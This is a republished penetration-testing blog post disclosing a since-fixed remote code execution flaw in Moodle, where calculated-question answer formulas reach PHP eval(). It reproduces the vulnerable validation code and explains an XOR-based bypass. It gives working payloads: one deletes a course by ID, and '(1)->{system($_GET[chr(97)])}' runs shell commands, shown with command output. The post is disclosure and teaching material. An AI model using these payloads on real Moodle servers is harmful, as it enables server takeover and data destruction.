Back to School - Exploiting a Remote Code Execution Vulnerability in Moodle
2024-8-28 21:31:3 Author: govuln.com(查看原文) 阅读量:18 收藏

27 August 2024

Surprisingly often, implementations include functionality where user input is passed to dangerous functions like PHP’s eval() - despite clear warnings. Often, devs are somewhat aware of this danger and attempt to sanitize the input, but this approach is rarely as robust as assumed. In this post, we will show you how we bypassed the sanitization attempts of the popular learning platform Moodle to achieve remote code execution, and demonstrate why it is always best to stick to the famous quote from Rasmus Lersdorf, creator of PHP:

If eval() is the answer, you’re almost certainly asking the wrong question.

The vulnerability was corrected in Moodle versions 4.4.2, 4.3.6, 4.2.9, and 4.1.12 released Aug 10, 2024.

Person sitting in front of a computer within a burning room

What’s a Moodle?

We recently had a chance to take a closer look at Moodle, a popular learning management system (LMS), in the context of a penetration test. Moodle is used by various companies and universities around the world, including the RWTH Aachen University in Germany - the university where RedTeam Pentesting was originally founded as a research group.

Even at first glance, it is clear that Moodle is a complex system with some surprising security consequences – for example: did you know that all users with the “trainer” role can perform Cross-Site Scripting attacks by design! This gave us the feeling that it would be challenging to completely secure the platform, and we were indeed able to identify several potential vulnerabilities. One of the identified issues was especially interesting, so we decided to publish this blog post with more details on the process of exploiting the vulnerability and our findings along the way.

Being a learning platform, Moodle includes functionality to create quizzes which can be used to test if a lesson was actually understood (or not). One advantage of automatically created tests is the ability to generate a variety of different questions from a single template, which can be realized via calculated questions in Moodle. Calculated questions are numeric questions that can contain variables (called “wildcards” by Moodle), denoted by curly braces (e.g., {a}), which can be assigned to intervals of numbers. Each time the question is generated, the variable is substituted by a different value from the defined number range.

To check, whether a given answer to the generated question is correct, trainers can define an answer formula. Can you guess how these formulas are handled in Moodle to enable variable substitution and complicated mathematical expressions? Maybe a dedicated parser is used, which only allows a small subset of safe functions and is carefully constructed to prevent abuse? Or maybe there is an easier way to do this? Well, in this case, formulas are simply passed to eval()!

question/type/calculated/question.php:

425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
/**
 * Evaluate an expression using the variable values.
 * @param string $expression the expression. A PHP expression with placeholders
 *      like {a} for where the variables need to go.
 * @return float the computed result.
 */
public function calculate($expression) {
    // Make sure no malicious code is present in the expression. Refer MDL-46148 for details.
    if ($error = qtype_calculated_find_formula_errors($expression)) {
        throw new moodle_exception('illegalformulasyntax', 'qtype_calculated', '', $error);
    }
    $expression = $this->substitute_values_for_eval($expression);
    if ($datasets = question_bank::get_qtype('calculated')->find_dataset_names($expression)) {
        // Some placeholders were not substituted.
        throw new moodle_exception('illegalformulasyntax', 'qtype_calculated', '',
            '{' . reset($datasets) . '}');
    }
    return $this->calculate_raw($expression);
}

/**
 * Evaluate an expression after the variable values have been substituted.
 * @param string $expression the expression. A PHP expression with placeholders
 *      like {a} for where the variables need to go.
 * @return float the computed result.
 */
protected function calculate_raw($expression) {
    try {
        // In older PHP versions this this is a way to validate code passed to eval.
        // The trick came from http://php.net/manual/en/function.eval.php.
        if (@eval('return true; $result = ' . $expression . ';')) {
            return eval('return ' . $expression . ';');
        }
    } catch (Throwable $e) {
        // PHP7 and later now throws ParseException and friends from eval(),
        // which is much better.
    }
    // In either case of an invalid $expression, we end here.
    throw new moodle_exception('illegalformulasyntax', 'qtype_calculated', '', $expression);
}

All code examples in this blog post are taken from Moodle version 4.4.1.

So there is some validation going on (line 433), probably because the functionality could be exploited several times in the past, as also indicated by the comment (MDL-46148). Still, every string that passes qtype_calculated_find_formula_errors will be passed straight into eval (line 456).

The goal now of course is to find a way to define arbitrary commands that are executed when passed to eval but do not fail the validation check. We invite you to try and hack along, maybe you can even find an interesting or more powerful way to circumvent the check (let us know!). You can find a stripped-down version of the relevant functions to test your ideas in our repository for this blog post.

Lesson One: Introducing the Validation Process

Let’s first take a closer look at the validation function, which is also reproduced in the validation.php file in our repository:

question/type/calculated/questiontype.php:

1940
1941
1942
1943
1944
1945
1946
1947
1948
1949
1950
/**
 * Validate a forumula.
 * @param string $formula the formula to validate.
 * @return string|boolean false if there are no problems. Otherwise a string error message.
 */
function qtype_calculated_find_formula_errors($formula) {
    foreach (['//', '/*', '#', '<?', '?>'] as $commentstart) {
        if (strpos($formula, $commentstart) !== false) {
            return get_string('illegalformulasyntax', 'qtype_calculated', $commentstart);
        }
    }

The first constraint imposed by the check is that the given answer formula must not include any PHP comments. Easy enough.

1956
1957
1958
1959
1960
1961
1962
1963
1964
1965
1966
    $formula = preg_replace(qtype_calculated::PLACEHODLER_REGEX, '1.0', $formula);

    // Strip away empty space and lowercase it.
    $formula = strtolower(str_replace(' ', '', $formula));

    $safeoperatorchar = '-+/*%>:^\~<?=&|!'; /* */
    $operatorornumber = "[{$safeoperatorchar}.0-9eE]";

    while (preg_match("~(^|[{$safeoperatorchar},(])([a-z0-9_]*)" .
            "\\(({$operatorornumber}+(,{$operatorornumber}+((,{$operatorornumber}+)+)?)?)?\\)~",
            $formula, $regs)) {

This is were things get a bit more complicated. First, all variables are replaced by the number 1.0. There are some restrictions on variable names, mostly to prevent any quotation marks, but they are relatively benign in comparison to the rest of the validation, so we will ignore them for now.

Next, the formula is converted to lower case and spaces are removed. Two character sets are defined:

  • “Safe operator characters”, which include operators for basic mathematical expressions, but also bitwise operations and comparisons
  • “Operators or numbers”, where numbers, a dot for decimals, and “e” and “E” for scientific notation are added to the safe operator characters

The main validation logic is realized by looping over the formula and identifying the left-innermost mathematical expression, which can be distinguished by a lack of nested parentheses. This expression is then replaced by a 1.0 if it does not contain any functionality that is not explicitly allowed:

1967
1968
1969
1970
1971
1972
1973
1974
1975
1976
1977
1978
1979
1980
1981
1982
1983
1984
1985
1986
1987
1988
1989
1990
1991
1992
1993
1994
1995
1996
1997
1998
1999
2000
2001
2002
2003
2004
2005
2006
2007
2008
2009
2010
2011
2012
2013
2014
2015
2016
2017
2018
2019
2020
2021
2022
2023
2024
2025
2026
2027
2028
        switch ($regs[2]) {
            // Simple parenthesis.
            case '':
                if ((isset($regs[4]) && $regs[4]) || strlen($regs[3]) == 0) {
                    return get_string('illegalformulasyntax', 'qtype_calculated', $regs[0]);
                }
                break;

                // Zero argument functions.
            case 'pi':
                if (array_key_exists(3, $regs)) {
                    return get_string('functiontakesnoargs', 'qtype_calculated', $regs[2]);
                }
                break;

            // Single argument functions (the most common case).
            case 'abs': case 'acos': case 'acosh': case 'asin': case 'asinh':
            case 'atan': case 'atanh': case 'bindec': case 'ceil': case 'cos':
            case 'cosh': case 'decbin': case 'decoct': case 'deg2rad':
            case 'exp': case 'expm1': case 'floor': case 'is_finite':
            case 'is_infinite': case 'is_nan': case 'log10': case 'log1p':
            case 'octdec': case 'rad2deg': case 'sin': case 'sinh': case 'sqrt':
            case 'tan': case 'tanh':
                if (!empty($regs[4]) || empty($regs[3])) {
                    return get_string('functiontakesonearg', 'qtype_calculated', $regs[2]);
                }
                break;

                // Functions that take one or two arguments.
            case 'log': case 'round':
                    if (!empty($regs[5]) || empty($regs[3])) {
                        return get_string('functiontakesoneortwoargs', 'qtype_calculated', $regs[2]);
                    }
                break;

                // Functions that must have two arguments.
            case 'atan2': case 'fmod': case 'pow':
                        if (!empty($regs[5]) || empty($regs[4])) {
                            return get_string('functiontakestwoargs', 'qtype_calculated', $regs[2]);
                        }
                break;

                // Functions that take two or more arguments.
            case 'min': case 'max':
                    if (empty($regs[4])) {
                        return get_string('functiontakesatleasttwo', 'qtype_calculated', $regs[2]);
                    }
                break;

            default:
                return get_string('unsupportedformulafunction', 'qtype_calculated', $regs[2]);
        }

        // Exchange the function call with '1.0' and then check for
        // another function call...
        if ($regs[1]) {
            // The function call is proceeded by an operator.
            $formula = str_replace($regs[0], $regs[1] . '1.0', $formula);
        } else {
            // The function call starts the formula.
            $formula = preg_replace('~^' . preg_quote($regs[2], '~') . '\([^)]*\)~', '1.0', $formula);
        }

Note that a handful of mathematical functions are explicitly allowed; all other function names lead to a validation error.

Finally, after the regular expression returns no additional matches, the formula is considered valid if it only contains safe operators or numbers:

2031
2032
2033
2034
2035
2036
    if (preg_match("~[^{$safeoperatorchar}.0-9eE]+~", $formula, $regs)) {
        return get_string('illegalformulasyntax', 'qtype_calculated', $regs[0]);
    } else {
        // Formula just might be valid.
        return false;
    }

The original formula will only be passed to eval if this final check is successful.

Note that variables are basically ignored by the validation function, since they are immediately replaced by the number 1.0 in the first step. At first, we did not find a way to make use of this fact, but it turned out to play an important part in the final exploit…

It is also likely, however, that this makes the function trivially exploitable when using older versions of PHP where the array access operator using curly braces is still available. For example, (1){phpinfo()} would look like the nonsensical but “safe” expression (1)1.0 to the validation function, and would lead to a call to phpinfo() or any other function defined in the variable name. Unfortunately for us, this notation was deprecated and removed in PHP starting from version 8, which is the currently supported version on most operating systems, including the system we were testing. So we had to find a different approach.

Get Educated: A Study on Cool PHP Features

Have you ever heard of JSFuck? It is an “esoteric subset” of JavaScript that makes do with only six characters ([]()+!) - and there are similar approaches for PHP (see e.g., this repository). This inspired us to apply a similar technique to bypass the validation logic. However, all the approaches we found at the time require square brackets for array access, and these are completely forbidden by the check. At some point we also discovered other approaches similar to PHPFuck which do not rely on square brackets, but none of them seem to satisfy the requirements of Moodle’s validation function.

However, there is still a number of powerful tools available to us even without square brackets. First, we get access to several mathematical functions, including our new favourite acos. acos is the inverse of the trigonometric cosine function, and is therefore undefined for values above 1. As such, acos(2) is not a number, which is represented as NAN in PHP. But how would a NAN help us to execute code? Well, it’s complicated but bear with us and we promise it will all make sense in the end. But first, we need more NANs.

Interestingly, the decimal dot symbol . can also be used for string concatenation in PHP, and numbers are automatically cast to strings when they are concatenated. This means, that an expression like “acos(2) . acos(2)” results in the stringNANNAN”. However, it was not immediately possible to concatenate two calls of acos directly because the validation logic would not allow the second call without an actual “operator” between the calls (again: the dot is only included for decimal points). Luckily, we quickly found that this restriction can be avoided by using acos(2) . 0+acos(2), so we can finally generate NANNANNANNAN.

Next, we can use the XOR operator ^ (proper use of an actual operator this time!), to flip some of the bits in the resulting string:

(acos(2) . 1) ^ (0 . 0 . 0) ^ (1 . 1 . 1)

This expression is a lot to take in, but let’s step through it part by part. In the first of the three sections, (acos(2) . 1), the result of acos(2) is converted to a string by appending the character 1 resulting in the string NAN1.

The other two sections define strings of numbers, which are XORed to NAN1. Here, the concatenation causes the three numbers to be cast to a three-letter string with the ASCII representations of each number:

Visualization of an example XOR operation

Visualization of an example XOR operation

Next, the XOR operation is performed letter by letter. The first XOR is applied to the N of NAN1, the 0 of 000, and the 1 of 111. Note that the 0 is not a null byte, but the ASCII number 0x30 of the character 0. The same goes for 1 which corresponds to ASCII 0x31.

Visualization of an example XOR operation

Visualization of an example XOR operation

The XOR operation between the first and the second section results in the tilde character ~. Finally, we have to XOR the tilde character with the 1 character from the last section, thus resulting in a capital O:

Visualization of an example XOR operation

Visualization of an example XOR operation

This seems like a great way to change the NAN strings to arbitrary letters. Unfortunately, this is not quite true since numbers only cover a small subset of the ASCII range. In particular, we can only flip the four least significant bits when using numbers and XOR, which is not sufficient to generate arbitrary characters. Is this where the journey ends?

No, number theory to the rescue! We can also use negative numbers, and the minus sign can be used to flip the elusive higher bits. Say we want to turn an A into a T, we could apply XOR between A, - and 8:

A: 0100 0001
-: 0010 1101
8: 0011 1000
------------
T: 0101 0100

Now that we can get arbitrary characters, let’s move on to arbitrary strings. Remember the 1 from NAN1? We kind of glossed over it when we said we apply the XOR letter by letter, since there is no fourth letter in the other two sections. In fact, the unmatched 1 is simply dropped when XOR is performed. We can exploit this behaviour together with our arbitrarily long sequences of NANNANNANNAN... to create strings of any length instead of a multiple of three.

Since doing this process manually is a pain, we created a script that does it for us.

As a more complete example, the following expression evaluates to PRINTF:

(acos(2) . 0+acos(2)) ^ (2 . 6 . 0 . 0 . 0 . 0) ^ (1 . 0 . 0 . 0 . -8) ^ (0 . -4 . 1 . 8 . 0) ^ (-8 . 3 . 1 . 0 . 0)

But what can we do with strings? This is were a particular quirk of PHP comes into play: variable functions. With this feature, these two lines do exactly the same thing:

Isn’t this great? All we have to do is to find an expression that evaluates to a string containing the function name we want to call, add parentheses with the arguments, and the function is called. Sounds easy enough, so we gave it a try.

Coming to (Mid)Terms: Restricted Function Calls

So to summarize, we are now able to generate almost arbitrary strings using valid mathematical expressions. There is just one remaining problem: The validation formula does not allow us to directly follow the string with a new set of parentheses. In other words, we can create a function name, which requires a mathematical expression, but we cannot call the function, since this would require a second “expression”, or at least parentheses, but the validation function requires two expressions to be connected with a mathematical operator (e.g. +). Can we find a way around this restriction?

We took another look at the source code at this point, and noticed something interesting about the variable substitution:

466
467
468
469
470
471
472
473
474
475
    /**
     * Substitute variable placehodlers like {a} with their value wrapped in ().
     * @param string $expression the expression. A PHP expression with placeholders
     *      like {a} for where the variables need to go.
     * @return string the expression with each placeholder replaced by the
     *      corresponding value.
     */
    protected function substitute_values_for_eval($expression) {
        return str_replace($this->search, $this->safevalue, $expression);
    }

“With their value wrapped in ()” - this means that when the variable a is set to 1, {a} is substituted by (1). Consequently, if we add {a} to the expression above which corresponds to 'PRINTF' the result will be 'PRINTF'(1) – a function call. Luckily, substitution happens after the validation check, and the check basically ignores variables.

In all, we can define an answer formula with two parts: a (function_name) and a {variable}. The check first removes the {variable} part and performs validation on the remaining expression, which constructs the function name as a string in a single mathematical expression. Then, the substitution happens and gives us our sought-after parentheses (we never thought it would feel so good to add parentheses - is this what LISP programmers feel like every day?)

There is of course a massive restriction here: This approach only allows us to call functions that take at most one numeric parameter. It is not even possible to use the output of a function call as input for a different function call. In other words, unless we can find a function that allows us to pass more complex commands, for example via information from the HTTP request, the impact of this vulnerability is greatly restricted.

Still, the information returned by the function call is shown to the attacker, as the output is directly embedded into the website. Therefore, functions like phpinfo() can disclose some internal information to attackers. In addition, there are several functions which only require a single argument and have an impact on the availability of Moodle. A prominent example is the DELETE_COURSE function, which, as the name suggests, deletes a course. It has only one required parameter: The ID of the course - a single integer.

A full exploit resulting in a deleted course would look like this:

  1. Create a calculated question with one variable, for example {a}
  2. Save the question and define the value range of the variable to be exactly the ID of the course you want to delete (course IDs are increasing numbers and easy to guess)
  3. Save the question, then edit it again
  4. Now change the answer formula to the following expression:
((acos(2) . 0+acos(2) . 0+acos(2) . 0+acos(2) . 0+acos(2)) ^ (8 . 4 . 2 . 8 . 8 . 3 . 4 . 0 . 0 . 0 . -1 . 3) ^ (2 . 0 . 0 . 3 . 0 . 0 . 0 . 0 . 0 . -8 . 1 . 0) ^ (0 . 0 . 0 . 0 . 0 . 0 . -2 . 1 . 4 . 6 . 0 . 0) ^ (0 . 0 . 0 . 0 . -8 . 8 . 0 . 0 . 2 . 0 . -8)){a}
  1. Save again, you might get an error (“Exception - syntax error, unexpected integer”) when trying to save but this can be ignored
  2. Preview the question - you should get notifications about the selected course being deleted:

Screenshot of a browser showing a list of notifications about a course being deleted above a Moodle question

Screenshot of a browser showing a list of notifications about a course being deleted above a Moodle question

The Finals: Remote Code Execution

We can now call arbitrary functions with exactly one numeric parameter. How do we get to remote code execution from here? Well, if you know the answer let us know, because we did not actually find a way to do this by utilizing the described method.

Instead, we played around with the validation function some more, when we noticed something:

php > echo (1)->1.0;
PHP Parse error:  syntax error, unexpected floating-point number "1.0", expecting identifier or variable or "{" or "$" in php shell code on line 1

… the interpreter expects curly braces?

It turns out, there is a somewhat obscure way to access properties of objects using curly braces, which is part of the variable variables syntax (they are actually called that). Following the examples of the PHP documentation, expressions like these are possible:

$start = 'b';
$end   = 'ar';
echo $foo->{$start . $end} . "\n";

This accesses the bar property of the object $foo.

So instead of the complicated expressions described before we can just use an answer formula like the following:

(1)->{system($_GET[chr(97)])}

The expression in curly braces is evaluated in order to find the referenced property, so all included functions are called as well. In this case, the value of the HTTP query parameter “a” (ASCII 0x61, or 97) is passed to the system() function to execute arbitrary commands. We use the chr function to define the character “a” since quotation marks are not allowed in variable names.

However, Moodle will interpret {system($_GET[chr(97)])} as a variable and attempt to replace it by a number, which makes no sense in this case and messes up our exploit. Fortunately, we found an obscure way to prevent this from happening: In the form where variable substitutions can be defined, a selection box for the detected variable named {system($_GET[chr(97)])} will be displayed. By editing the HTML markup, the value attribute of the selected option of the variable can be changed to 0 before submitting the request, which prevents it from being substituted. After saving the question, we can choose a command to be executed by adding the query parameter a=[command] to the URL.

All in all, an exploit of this approach would look like this:

  1. Create a calculated question
  2. Set the answer formula to
(1)->{system($_GET[chr(97)])}
  1. Save, prevent the variable from being substituted as explained above

After saving the question, an error "Exception - system(): Argument #1 ($command) cannot be empty"is returned:

Screenshot of a browser showing an exception about missing arguments for the system function in the Moodle question creation workflow

Screenshot of a browser showing an exception about missing arguments for the system function in the Moodle question creation workflow

This is what we get when we change the URL and add &a=id:

uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<!DOCTYPE html>

<html  dir="ltr" lang="en" xml:lang="en">
<head>
    <title>Editing a Calculated question | Test</title>
[...]

And we’re in.

AfterMath

In conclusion, we found a way for users with the “trainer” role, which has the required permissions to create questions by default, to execute code on Moodle servers.

We would have enjoyed the complex way to be the one resulting in arbitrary RCE in the end, since it makes for a cooler story. In fact, this blog post probably wouldn’t exist if we only found the second variant. Still, it demonstrates that an easier solution is often superior, and that looking left and right while digging deep is usually beneficial during penetration tests.

This finding was communicated to the Moodle security team on Jul 12, 2024, and has been fixed in versions 4.4.2, 4.3.6, 4.2.9, and 4.1.12, released Aug 10, 2024. You can also find the corresponding advisory on our website.

The issue described in this blog post was fixed by restricting the set of allowed characters in variable names and formulas. The fixed versions no longer include the required binary operations in the allowed formula syntax, which thwarts our method of creating arbitrary strings. In addition, variable names can only include alphanumeric characters, spaces, minuses or underscores now, which are not sufficient to call or (re-)define arbitrary functions (which requires parentheses), or, for example, overwrite variables (requires the dollar symbol). While this still allows the usage of several keywords in variable names, such as new, we did not find any obvious ways to abuse this behaviour in the time we had available to confirm the fix. The call to eval() remains, however the project mentioned plans to replace it with a custom parsing library in the future, when time permits.

To summarize, it is still a bad idea to pass user input to eval, even if you perform sanitization. PHP has a lot of features and quirks that make it possible to obfuscate malicious input, including PHPFuck, variable functions, and the obscure way to access object properties using curly braces. It is virtually impossible to understand all obscure aspects and interactions in a programming language to effectively sanitize input. Consequently, we have to concur with the creator of PHP:

If eval() is the answer, you’re almost certainly asking the wrong question.

And before you’re asking, this also holds for basically all other languages with an eval equivalent.


文章来源: https://govuln.com/news/url/B16N
如有侵权请联系:admin#unsafe.sh